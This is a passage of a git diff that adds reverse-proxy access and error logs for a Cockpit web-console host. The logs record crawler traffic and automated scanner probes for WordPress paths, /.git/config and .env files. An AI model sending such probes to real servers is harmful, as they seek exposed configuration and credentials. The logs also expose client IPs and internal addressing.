4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[30/Jan/2026:04:50:32 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 149.57.180.167] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[30/Jan/2026:07:45:49 +0000] - 404 404 - GET https terminal.profibot.hu "/robots.txt" [Client 74.7.244.51] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[30/Jan/2026:07:45:49 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 74.7.227.154] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-" +[30/Jan/2026:07:45:52 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/login.css" [Client 74.7.227.154] [Length 14139] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://terminal.profibot.hu/" +[30/Jan/2026:07:45:55 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/branding.css" [Client 74.7.227.154] [Length 518] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://terminal.profibot.hu/" +[30/Jan/2026:07:45:58 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/login.js" [Client 74.7.227.154] [Length 16683] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://terminal.profibot.hu/" +[30/Jan/2026:07:46:00 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/fonts/RedHatText-Medium.woff2" [Client 74.7.227.154] [Length 26880] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://terminal.profibot.hu/cockpit/static/login.css" +[30/Jan/2026:07:46:02 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/fonts/RedHatText-Regular.woff2" [Client 74.7.227.154] [Length 25844] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://terminal.profibot.hu/cockpit/static/login.css" +[30/Jan/2026:07:46:04 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/logo.png" [Client 74.7.227.154] [Length 4420] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://terminal.profibot.hu/cockpit/static/branding.css" +[30/Jan/2026:07:46:05 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/bg-plain.jpg" [Client 74.7.227.154] [Length 81737] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://terminal.profibot.hu/cockpit/static/branding.css" +[30/Jan/2026:07:50:44 +0000] - 405 405 - POST https terminal.profibot.hu "/" [Client 85.11.167.4] [Length 3244] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://terminal.profibot.hu" +[30/Jan/2026:07:50:44 +0000] - 405 405 - POST https terminal.profibot.hu "/" [Client 85.11.167.4] [Length 3250] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://terminal.profibot.hu" +[30/Jan/2026:09:13:36 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 208.84.101.251] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:37 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 208.84.101.251] [Length 11741] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:37 +0000] - 404 404 - GET https terminal.profibot.hu "//wp-includes/wlwmanifest.xml" [Client 208.84.101.251] [Length 3232] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:37 +0000] - 404 404 - GET https terminal.profibot.hu "//xmlrpc.php?rsd" [Client 208.84.101.251] [Length 3232] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:38 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 208.84.101.251] [Length 11741] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:38 +0000] - 404 404 - GET https terminal.profibot.hu "//blog/wp-includes/wlwmanifest.xml" [Client 208.84.101.251] [Length 3226] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:38 +0000] - 404 404 - GET https terminal.profibot.hu "//web/wp-includes/wlwmanifest.xml" [Client 208.84.101.251] [Length 3232] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:38 +0000] - 404 404 - GET https terminal.profibot.hu "//wordpress/wp-includes/wlwmanifest.xml" [Client 208.84.101.251] [Length 3232] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:38 +0000] - 404 404 - GET https terminal.profibot.hu "//website/wp-includes/wlwmanifest.xml" [Client 208.84.101.251] [Length 3232] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:39 +0000] - 404 404 - GET https terminal.profibot.hu "//wp/wp-includes/wlwmanifest.xml" [Client 208.84.101.251] [Length 3232] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:39 +0000] - 404 404 - GET https terminal.profibot.hu "//news/wp-includes/wlwmanifest.xml" [Client 208.84.101.251] [Length 3232] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:39 +0000] - 404 404 - GET https terminal.profibot.hu "//2018/wp-includes/wlwmanifest.xml" [Client 208.84.101.251] [Length 3232] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:39 +0000] - 404 404 - GET https terminal.profibot.hu "//2019/wp-includes/wlwmanifest.xml" [Client 208.84.101.251] [Length 3226] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:39 +0000] - 404 404 - GET https terminal.profibot.hu "//shop/wp-includes/wlwmanifest.xml" [Client 208.84.101.251] [Length 3232] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:40 +0000] - 404 404 - GET https terminal.profibot.hu "//wp1/wp-includes/wlwmanifest.xml" [Client 208.84.101.251] [Length 3226] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:40 +0000] - 404 404 - GET https terminal.profibot.hu "//test/wp-includes/wlwmanifest.xml" [Client 208.84.101.251] [Length 3226] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:40 +0000] - 404 404 - GET https terminal.profibot.hu "//media/wp-includes/wlwmanifest.xml" [Client 208.84.101.251] [Length 3226] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:40 +0000] - 404 404 - GET https terminal.profibot.hu "//wp2/wp-includes/wlwmanifest.xml" [Client 208.84.101.251] [Length 3232] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:40 +0000] - 404 404 - GET https terminal.profibot.hu "//site/wp-includes/wlwmanifest.xml" [Client 208.84.101.251] [Length 3232] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:40 +0000] - 404 404 - GET https terminal.profibot.hu "//cms/wp-includes/wlwmanifest.xml" [Client 208.84.101.251] [Length 3226] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:41 +0000] - 404 404 - GET https terminal.profibot.hu "//sito/wp-includes/wlwmanifest.xml" [Client 208.84.101.251] [Length 3232] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[30/Jan/2026:09:13:41 +0000] - - 400 - - https terminal.profibot.hu "-" [Client 208.84.101.251] [Length 0] [Gzip -] [Sent-to ] "-" "-" +[30/Jan/2026:09:30:24 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 44.210.192.229] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" +[30/Jan/2026:09:36:50 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 44.210.192.229] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[30/Jan/2026:09:36:51 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 44.210.192.229] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[30/Jan/2026:11:08:48 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 44.196.29.182] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[30/Jan/2026:11:11:28 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 34.141.254.56] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Scrapy/2.13.4 (+https://scrapy.org)" "-" +[30/Jan/2026:11:47:37 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 54.162.31.194] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" "-" +[30/Jan/2026:11:47:38 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 54.162.31.194] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" "-" +[31/Jan/2026:01:12:20 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 165.227.88.220] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[31/Jan/2026:01:12:20 +0000] - - 301 - GET http terminal.profibot.hu "/favicon.ico" [Client 165.227.88.220] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "http://terminal.profibot.hu/" +[31/Jan/2026:01:12:21 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 165.227.88.220] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[31/Jan/2026:01:12:24 +0000] - 200 200 - GET https terminal.profibot.hu "/favicon.ico" [Client 165.227.88.220] [Length 9662] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "https://terminal.profibot.hu/" +[31/Jan/2026:06:55:01 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 34.221.21.250] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[31/Jan/2026:06:55:01 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/login.js" [Client 34.221.21.250] [Length 16683] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0" "-" +[31/Jan/2026:10:07:54 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 37.76.43.179] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:07:54 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/login.css" [Client 37.76.43.179] [Length 14139] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:07:54 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/branding.css" [Client 37.76.43.179] [Length 518] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:07:54 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/login.js" [Client 37.76.43.179] [Length 16683] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:07:54 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/bg-plain.jpg" [Client 37.76.43.179] [Length 81737] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:07:54 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/logo.png" [Client 37.76.43.179] [Length 4420] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:07:54 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/fonts/RedHatText-Regular.woff2" [Client 37.76.43.179] [Length 25844] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:07:54 +0000] - 401 401 - GET https terminal.profibot.hu "/cockpit/login" [Client 37.76.43.179] [Length 3250] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:07:54 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/fonts/RedHatText-Medium.woff2" [Client 37.76.43.179] [Length 26880] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:07:56 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 66.249.81.193] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[31/Jan/2026:10:07:56 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 66.249.81.193] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[31/Jan/2026:10:07:56 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/login.js" [Client 66.249.81.193] [Length 16683] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[31/Jan/2026:10:07:56 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/branding.css" [Client 66.249.81.201] [Length 512] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[31/Jan/2026:10:07:56 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/login.css" [Client 66.249.81.192] [Length 14139] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[31/Jan/2026:10:07:56 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/fonts/RedHatText-Regular.woff2" [Client 66.249.81.193] [Length 25844] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[31/Jan/2026:10:07:56 +0000] - 401 401 - GET https terminal.profibot.hu "/cockpit/login" [Client 66.249.81.201] [Length 3256] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[31/Jan/2026:10:07:56 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/fonts/RedHatText-Medium.woff2" [Client 66.249.81.193] [Length 26880] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[31/Jan/2026:10:07:56 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 66.249.83.137] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[31/Jan/2026:10:07:57 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/login.css" [Client 66.249.83.107] [Length 14139] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[31/Jan/2026:10:07:57 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/branding.css" [Client 66.249.83.73] [Length 512] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[31/Jan/2026:10:07:57 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/fonts/RedHatText-Regular.woff2" [Client 66.249.83.75] [Length 25844] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[01/Feb/2026:03:54:38 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 23.27.145.250] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[01/Feb/2026:05:21:35 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 149.57.180.51] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[01/Feb/2026:13:42:53 +0000] - 404 404 - GET https terminal.profibot.hu "/.git/config" [Client 46.105.92.110] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (iPhone; CPU iPhone OS 17_2_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1" "https://www.notion.so/" +[02/Feb/2026:02:26:39 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 159.65.23.89] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[02/Feb/2026:02:26:39 +0000] - - 301 - GET http terminal.profibot.hu "/favicon.ico" [Client 159.65.23.89] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "http://terminal.profibot.hu/" +[02/Feb/2026:02:26:40 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 159.65.23.89] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[02/Feb/2026:02:26:41 +0000] - 200 200 - GET https terminal.profibot.hu "/favicon.ico" [Client 159.65.23.89] [Length 9662] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "https://terminal.profibot.hu/" +[02/Feb/2026:04:54:41 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 174.138.90.22] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "-" +[02/Feb/2026:08:24:01 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 138.197.25.239] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[02/Feb/2026:10:03:22 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 142.93.78.183] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" "-" +[02/Feb/2026:16:15:38 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 24.199.116.246] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[02/Feb/2026:16:15:39 +0000] - - 301 - GET http terminal.profibot.hu "/favicon.ico" [Client 24.199.116.246] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "http://terminal.profibot.hu/" +[02/Feb/2026:16:15:39 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 24.199.116.246] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[02/Feb/2026:16:15:44 +0000] - 200 200 - GET https terminal.profibot.hu "/favicon.ico" [Client 24.199.116.246] [Length 9662] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "https://terminal.profibot.hu/" diff --git a/proxy-manager/data/logs/proxy-host-10_error.log b/proxy-manager/data/logs/proxy-host-10_error.log new file mode 100755 index 0000000..30e91a7 --- /dev/null +++ b/proxy-manager/data/logs/proxy-host-10_error.log @@ -0,0 +1,3597 @@ +2026/01/27 23:22:16 [error] 292#292: *15355 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:16 [error] 292#292: *15355 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:16 [error] 292#292: *15355 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env.prod HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:16 [error] 292#292: *15355 web-terminal could not be resolved (2: Server failure), client: 104.244.74.39, server: terminal.profibot.hu, request: "HEAD /.env.dev HTTP/1.1", host: "terminal.profibot.hu" +2026/01/27 23:22:18 [error] 293#293: *15360 web-terminal could not be resolved (2: Server failure), client: 195.123.244.84, server: terminal.profibot.hu, request: "HEAD / HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu" +2026/01/27 23:22:19 [error] 294#294: *15362 web-terminal 